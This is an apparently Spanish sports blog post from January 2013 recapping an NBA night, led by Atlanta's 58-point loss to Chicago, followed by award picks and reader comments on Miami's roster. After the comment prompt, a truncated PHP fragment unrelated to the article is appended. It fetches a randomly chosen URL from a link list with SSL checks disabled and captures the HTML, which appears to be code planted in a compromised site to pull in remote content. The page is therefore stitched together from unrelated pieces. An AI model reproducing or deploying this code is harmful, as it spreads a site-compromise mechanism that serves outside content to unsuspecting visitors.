La Crónica: Sonrojantes 58 puntos

15 de January de 2013 por Simon

Atlanta protagonizó uno de los partidos más bochornosos de la historia en la derrota en Chicago ante los Bulls (58-97). El partido fue dominado de principio a fin por los locales que no encontraron rival. Los Hawks anotaron tan sólo 5 puntos  en el segundo cuarto para un acumulado de 20 en la primera parte. A punto estuvieron de batir a los Clippers de 1999 que poseen el récord de peor anotación en una mitad de la historia con 19 puntos. Los 58 puntos finales suponen la segunda peor marca de la historia de la franquicia. Fue Jeff Teague el que evitó a falta de 6 segundos que superaran a los Hawks de 1955 que tienen el peor dato de anotación con 57. No tienen suerte los entrenadores del mes en el Este: Si Avery Johnson se encontró en el paro apenas 20 días después de ser nombrado entrenador de Noviembre en el Este, Larry Drew, tras ser nombrado Entrenador del mes de Diciembre, se encuentra con su equipo en plena crisis de juego y resultados y batiendo récords negativos. Ya han caído al sexto puesto de la conferencia.

En el duelo de gallos del Oeste en el FedExForum de Memphis  salió como ganador el equipo visitante, los Clippers, que actualmente es el único capaz de seguir el ritmo de OKC. Fue un partido plácido para L.A. a pesar de no contar con Chris Paul debido a una contusión en la rodilla. Memphis tampoco pudo contar con Rudy Gay. Desde el inicio Clippers tuvo más ritmo que Memphis, aunque el partido no se rompió  hasta el segundo cuarto en el que a Memphis le costó mucho ver aro y seguir el ritmo que imponía el banquillo visistante capitaneado, como siempre, por Crawford y Barnes. Las ventajas de 20 puntos que disfrutó Clippers hicieron que sus titulares pudieran descansar: apenas 23 o 24 minutos de media ayer parael quinteto titular en cancha. Buen partido de Bledsoe en ausencia de Chris Paul. También vimos el segundo partido de Grant Hill con Clippers y su primera aportación consistente: 8 puntos, 4 rebotes, 4 asistencias para él en 17 minutos  (99-73). 

Utah Jazz hizo valer su condición de local ante los actuales campeones. Miami sigue con muchos problemas para ganar fuera de su pabellón. A domicilio pierden más partidos de los que ganan. El partido no tuvo mucha historia. Desde el inicio Utah fue capaz de conseguir importantes ventajas que rozaron los 20 puntos. Heat maquilló el resultado en el último cuarto para acabar perdiendo de tan solo 7 puntos pero nunca hubo posibilidad real de victoria para los campeones ayer.  Hayward, que cada vez está jugando mejor y de manera más regular, consiguió 22 puntos para ser el mejor de los Jazz (97-104).

Boston ganó en el TD Garden a Charlotte Bobcats. Los de Doc Rivers mandaron durante todo el partido con cómodas ventajas sobre todo en el primer tiempo gracias a una gran actuación de Rajon Rondo pero un apretón en el inicio del tercer cuarto de Charlotte llegó a empatar el partido. Una gran serie de canastas de Boston llevó el partido de nuevo a los 8-10 puntos de ventaja para Boston que ya mantuvieron hasta el final. Ya son seis victorias consecutivas de Boston que lo catapultan a la lucha por la ventaja de campo en la primera ronda de Play Off. Rondo consiguió un tripe doble para ser el mejor de su equipo (89-100).

En el resto de la jornada, Durant sigue imparable y con 41 puntos destrozó a Phoenix (102-90). Westbrook lo acompañó con 36 puntos. Washington Wizards le propinó una paliza a Orlando Magic en el retorno de Geln Davis (91-120).  Dallas dio buena cuenta de Minnesota de la mano del trío Mayo, Collison, Brand que se combinaron para 63 puntos para lograr una cómoda ventaja e intentar la remontada para lograr un puesto en Play Off que ahora mismo se antoja imposible  (98-113). Finalmente, Sacramento venció a Cavaliers  en un entretenido partido. Cousins continúa su buen momento desde la sanción disciplinaria que le impusieron los Kings (118-124).

PREMIOS

MVP: Tremenda actuación de la pareja Durant-Westbrook. El primero anotó 41 puntos pero el segundo no se quedó atrás con sus 36 puntos, 5 asistencias y 8 rebotes.

Rookie: Exhibición de Dion Waiters en la derrota ante los Kings. Anotó 33 puntos con un 66% de acierto en el tiro y además repartió 5 asistencias.

Sorpresa: Gran partido de Elton Brand, autor de 20 puntos (10 de 13) y 6 rebotes. Emeka Okafor también jugó bien y consiguió un doble-doble de 19 puntos y 11 rebotes.

Decepción: Nada puede ser peor que los 58 puntos de los Hawks aunque Arron Afflalo se marcó un 1 de 11 en su partido frente los Wizards.

Esfuerzo en vano: Últimamente Lebron James aparece mucho por este apartado. Los 32 puntos, 4 rebotes, 6 asistencias, 3 robos y 2 tapones no fueron suficientes para llevarse la victoria ante los Jazz.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

7 comentarios a esta entrada

  1. rumbero dice:
    #1

    Parece que Durant ya ha enchufado el modo MVP. Vaya partiditos lleva el amigo. Lo llegan a poner a él y 4 conos esta madrugada contra los Hawks y la faena que hubieran tenido los de Atlanta para ganar

      Citar

  2. Esteban dice:
    #2

    rumbero:
    Parece que Durant ya ha enchufado el modo MVP. Vaya partiditos lleva el amigo. Lo llegan a poner a él y 4 conos esta madrugada contra los Hawks y la faena que hubieran tenido los de Atlanta para ganar

    comparto rumbero, daba la sensacion de que lebron seria nuevamente el MVP, pero a este ritmo y con tantas derrotas es casi imposiblke, teniendo a durant clavando noche tras noche 40 puntos y capitaneando al equipo con mejor record de la liga

    luego del inicio de la temporada se hablo mucho que el record de bull de 70-12 corria peligro en manos de MIAMI, bueno nada mas alejado de la realidad, el heat ya llego a 12 derrotas en solo 36 partidos, son lideres del este, pero en el oeste estarian peleando entre el 4 y 5 puesto recien

    dos cosas, en primer lugar da toda la sensacion que el modelo de juego bajo de MIAMI no le da los resultados esperados, deberian moverse y cojer un pivote y jugar con unaformacion clasica, no todos los equipos tienen piedras ofensivas en la zona de pivote como el thunder que con perkins no lastima a nadie alli, DALEMBERT esta casi en el ostracismo, su llegada puede marcar un nuevo titulo para el heat, pero mientras esta todo muy abierto

    lo segundo es que da toda la sensacion al dia de hoy, que el heat no podria vencer ni al thunder, ni a clippers, ni a spurs

      Citar

  3. rumbero dice:
    #3

    Esteban:
    dos cosas, en primer lugar da toda la sensacion que el modelo de juego bajo de MIAMI no le da los resultados esperados, deberian moverse y cojer un pivote y jugar con unaformacion clasica, no todos los equipos tienen piedras ofensivas en la zona de pivote como el thunder que con perkins no lastima a nadie alli, DALEMBERT esta casi en el ostracismo, su llegada puede marcar un nuevo titulo para el heat, pero mientras esta todo muy abierto

    lo segundo es que da toda la sensacion al dia de hoy, que el heat no podria vencer ni al thunder, ni a clippers, ni a spurs

    Yo soy menos drástico en ese sentido. También pienso que el fichaje de un pívot de nivel medio-alto a principio de temporada les hubiera venido genial, aunque solo fuera un recurso en determinados partidos, pero optaron por potenciar aun más su juego. Dicho esto, a mi me da que van con el freno de mano puesto. La temporada pasada acabaron con un promedio de victorias parecido al que llevan ahora en RS y ya vimos como defendieron y jugaron en PO. Está claro que el resto de equipos saben como se les puede hacer daño pero siguen siendo los campeones.

      Citar

  4. Ruxixón dice:
    #4

    En el momento de la verdad van a dar un paso más,eso está claro,pero no siempre eso supone la solución y la variedad de alternativas,no solo las que pueda aportar Miami,si no las que pueda usar como herramienta contra equipos que carguen mucho el rebote,es muy importante.El problema es que ahora mismo es difícil que puedan coger un pívot medianamente decente.Supongo que al final Birdman firmará por ellos,a ver qué nivel tiene.

    Pude ver el partido de los Grizzlies sin Rudy Gay y fue horrible.El banquillo está descompensadísimo y hay buenos jugadores en la pintura pero en el exterior…Shelby y Bayless son lamentables.No sé si traspasarán a Gay -preferible que sea él antes que Z-BO la verdad- pero si lo hacen un traspaso con los Wizards con Beal mediante -que es el que está sonando- más Jordan Crawford y OKafor -mi odiado Okafor que está mostrando un gran nivel ultimamente- sería la mejor de las opciones,al menos de las que suenan.Jordan Crawford como microondas y OKafor para rotar ,siendo éste expiring,teniendo en cuenta que buscan aligerar carga salarial en Memphis.Probablemente Memphis debiera añadir a Speights o Arthur para cuadrar.

      Citar

  5. GreenPride dice:
    #5

    Bueno de anoche vi el Grizzlies-Clippers. Desastroso partido de los de Memphis. Sin una dirección clara, los Grizzlies se atascaron casi de inicio y jugaron un partido infumable. Los Clippers sin CP3 pasaron por encima del equipo local sin necesitar una gran versión de ninguno de sus mejores jugadores. Muy decepcionantes los dos últimos partidos para el equipo de Marc tras ganar a los Spurs en los dos últimos partidos.
    En Boston, los Celtics siguen ganando partidos y presentando su candidatura a los puestos de arriba del Este. Ayer victoria más o menos fácil contra los Bobcats con triple-doble de Rondo y un Bradley cada vez más importante. De momento adelantan a los Bucks y ya tienen a tiro a los desastrosos Hawks y muy cerca a Bulls, Nets y Pacers. Los 8 equipos de PO en el Este sólo están en 5 derrotas de diferencia así que todo por jugar en esta conferencia.
    En el Oeste KD ha cogido el modo MVP y si los Heat no espabilan este año el premio es para él. 77 puntos entre Durantula y Westbrook para el mejor record de la liga.
    P.D. Qué dificil es ganar en Utah

      Citar

  6. Esteban dice:
    #6

    siguiendo con el tema de MIAMI, el año pasado jugaron muchos partidos sin wade y eso estropeo su registro considerablemente, este año mas alla de algunas lesiones, han tenido por lo general el equipo completo y sin jugadores que deban coger ritmo, siendo campeones y ya casi sin peso en las espaldas, deberian ir mejor

    no se pero a mi me da mala espina esa formacion baja del heat, y la poca continuidad de su anthony en caso de ser necesario, es probable que se cruzen en PO con los pacers y HIBBERT los hizo sufrir el año pasado, ni hablar si deben contener a LOPEZ que no es un dios, pero se come crudos a internos de menos peso que el, incluso KG puede dañarlos como lo hizo el año pasado

    y me olvidaba, esta por volver o eso parece BYNUM, a este ritmo, los 76ers como mucho pueden aspirar a una octava plaza y sin dudas que el HEAT sera el UNO, por lo que es probable que se ecuentren con el primera ronda

    un pivote decente? ya te lo nombrabra, DALEMBERT, no es una maravilla, pero puede ser una pieza genial en un equipo que de el solo necesitara rebotes,m faltas y algo de intimidacion, eso puede hacerlo y muy bien

      Citar

  7. Denise dice:
    #7

    Creo que a los Heat les podría venir muy bien Mozgov o Anthony Randolph, dos jugadores que sufren el ostracismo en Denver debido a la profundidad de la plantilla.
    Con McGee y Koufos (no sé que ve Karl en este jugador tan mediocre para darle esa minutada, pero bueno) los Nuggets van bien servidos de Centers, por lo que quizas podrían interesarse por un par de rondas de Miami o por Norris Cole, que empezó muy bien su carrera pero en estos Heat con James y Wade no puede ejercer de base.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>